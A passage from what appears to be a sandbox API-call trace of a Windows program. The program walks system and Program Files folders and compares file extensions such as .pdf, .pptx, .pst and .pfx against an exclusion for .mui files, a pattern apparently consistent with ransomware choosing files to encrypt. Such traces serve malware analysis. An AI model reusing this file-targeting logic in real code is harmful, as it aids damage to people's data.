-1 [0046.641] lstrlenW (lpString=".mpv") returned 4 [0046.641] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0046.641] lstrlenW (lpString=".mrw") returned 4 [0046.641] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0046.641] lstrlenW (lpString=".msg") returned 4 [0046.641] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0046.641] lstrlenW (lpString=".mxl") returned 4 [0046.641] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".myd") returned 4 [0046.641] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".myi") returned 4 [0046.641] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".nef") returned 4 [0046.641] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".nrw") returned 4 [0046.641] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".obj") returned 4 [0046.641] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".odb") returned 4 [0046.641] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".odc") returned 4 [0046.641] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".odm") returned 4 [0046.641] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".odp") returned 4 [0046.641] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".ods") returned 4 [0046.641] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".oft") returned 4 [0046.641] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".one") returned 4 [0046.641] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0046.641] lstrlenW (lpString=".onepkg") returned 7 [0046.641] lstrcmpiW (lpString1=".onepkg", lpString2="dll.mui") returned -1 [0046.641] lstrlenW (lpString=".onetoc2") returned 8 [0046.641] lstrcmpiW (lpString1=".onetoc2", lpString2=".dll.mui") returned 1 [0046.642] lstrlenW (lpString=".opt") returned 4 [0046.642] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".oqy") returned 4 [0046.642] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".orf") returned 4 [0046.642] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".p12") returned 4 [0046.642] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".p7b") returned 4 [0046.642] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".p7c") returned 4 [0046.642] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pam") returned 4 [0046.642] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pbm") returned 4 [0046.642] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pct") returned 4 [0046.642] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pcx") returned 4 [0046.642] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pdd") returned 4 [0046.642] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pdf") returned 4 [0046.642] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pdp") returned 4 [0046.642] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pef") returned 4 [0046.642] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pem") returned 4 [0046.642] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pff") returned 4 [0046.642] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pfm") returned 4 [0046.642] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pfx") returned 4 [0046.642] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0046.642] lstrlenW (lpString=".pgm") returned 4 [0046.642] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0046.643] lstrlenW (lpString=".php") returned 4 [0046.643] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0046.643] lstrlenW (lpString=".php3") returned 5 [0046.643] lstrcmpiW (lpString1=".php3", lpString2="l.mui") returned -1 [0046.643] lstrlenW (lpString=".php4") returned 5 [0046.643] lstrcmpiW (lpString1=".php4", lpString2="l.mui") returned -1 [0046.643] lstrlenW (lpString=".php5") returned 5 [0046.643] lstrcmpiW (lpString1=".php5", lpString2="l.mui") returned -1 [0046.643] lstrlenW (lpString=".phtml") returned 6 [0046.643] lstrcmpiW (lpString1=".phtml", lpString2="ll.mui") returned -1 [0046.643] lstrlenW (lpString=".pict") returned 5 [0046.643] lstrcmpiW (lpString1=".pict", lpString2="l.mui") returned -1 [0046.643] lstrlenW (lpString=".pl") returned 3 [0046.643] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0046.643] lstrlenW (lpString=".pls") returned 4 [0046.643] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0046.643] lstrlenW (lpString=".pm") returned 3 [0046.643] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0046.643] lstrlenW (lpString=".png") returned 4 [0046.643] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0046.643] lstrlenW (lpString=".pnm") returned 4 [0046.643] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0046.643] lstrlenW (lpString=".pot") returned 4 [0046.643] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0046.643] lstrlenW (lpString=".potm") returned 5 [0046.643] lstrcmpiW (lpString1=".potm", lpString2="l.mui") returned -1 [0046.643] lstrlenW (lpString=".potx") returned 5 [0046.643] lstrcmpiW (lpString1=".potx", lpString2="l.mui") returned -1 [0046.643] lstrlenW (lpString=".ppa") returned 4 [0046.643] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0046.643] lstrlenW (lpString=".ppam") returned 5 [0046.643] lstrcmpiW (lpString1=".ppam", lpString2="l.mui") returned -1 [0046.643] lstrlenW (lpString=".ppm") returned 4 [0046.643] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0046.643] lstrlenW (lpString=".pps") returned 4 [0046.643] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0046.643] lstrlenW (lpString=".ppsm") returned 5 [0046.643] lstrcmpiW (lpString1=".ppsm", lpString2="l.mui") returned -1 [0046.644] lstrlenW (lpString=".ppt") returned 4 [0046.644] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0046.644] lstrlenW (lpString=".pptm") returned 5 [0046.644] lstrcmpiW (lpString1=".pptm", lpString2="l.mui") returned -1 [0046.644] lstrlenW (lpString=".pptx") returned 5 [0046.644] lstrcmpiW (lpString1=".pptx", lpString2="l.mui") returned -1 [0046.644] lstrlenW (lpString=".prn") returned 4 [0046.644] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0046.644] lstrlenW (lpString=".ps") returned 3 [0046.644] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0046.644] lstrlenW (lpString=".psb") returned 4 [0046.644] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0046.644] lstrlenW (lpString=".psd") returned 4 [0046.644] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0046.644] lstrlenW (lpString=".pst") returned 4 [0046.644] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0046.644] lstrlenW (lpString=".ptx") returned 4 [0046.644] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0046.644] lstrlenW (lpString=".pub") returned 4 [0046.644] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0046.644] lstrlenW (lpString=".pwm") returned 4 [0046.644] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0046.644] lstrlenW (lpString=".pxr") returned 4 [0046.644] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0046.644] lstrlenW (lpString=".py") returned 3 [0046.644] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0046.644] lstrlenW (lpString=".qt") returned 3 [0046.644] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0046.644] lstrlenW (lpString=".r3d") returned 4 [0046.644] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0046.644] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0046.644] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0046.645] FindClose (in: hFindFile=0x4260508 | out: hFindFile=0x4260508) returned 1 [0046.645] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.645] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0046.645] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.645] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0046.645] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.645] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0046.645] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.645] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0046.645] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.645] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0046.646] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.646] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0046.646] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.646] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0046.646] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.646] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0046.646] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.646] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0046.646] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.646] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6c9427, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef6c9427, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1236, dwReserved0=0x0, dwReserved1=0x240000, cFileName="updaterevokesipolicy.p7b", cAlternateFileName="UPDATE~1.P7B")) returned 1 [0046.647] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.647] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0046.647] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.647] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0046.647] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.647] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0046.647] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0046.647] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0046.648] FindNextFileW (in: hFindFile=0x5e9398, lpFindFileData=0x348fcf8 | out: lpFindFileData=0x348fcf8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0046.650] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0046.650] FindNextFileW (in: hFindFile=0x5e9398, lpFindFileData=0x348fcf8 | out: lpFindFileData=0x348fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0047.937] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0048.021] FindNextFileW (in: hFindFile=0x5e9398, lpFindFileData=0x348fcf8 | out: lpFindFileData=0x348fcf8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3d7ebe9, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0048.025] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6be970, Size=0x8000) returned 0x3cd0e58 [0048.026] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Winlogon%4Operational.evtx", cAlternateFileName="MID6AB~1.EVT")) returned 1 [0048.027] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0048.027] FindNextFileW (in: hFindFile=0x5e9398, lpFindFileData=0x348fcf8 | out: lpFindFileData=0x348fcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0x47384f2, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0048.027] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0048.027] FindNextFileW (in: hFindFile=0x5e9398, lpFindFileData=0x348fcf8 | out: lpFindFileData=0x348fcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe8fc11f1, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe8fc11f1, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0048.029] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42b1088 | out: hHeap=0x5d0000) returned 1 [0048.029] FindNextFileW (in: hFindFile=0x4260088, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0048.031] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0048.031] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ink", cAlternateFileName="")) returned 1 [0048.031] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.031] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0048.031] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.031] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0048.032] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.032] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0048.032] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.032] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0048.032] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.032] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 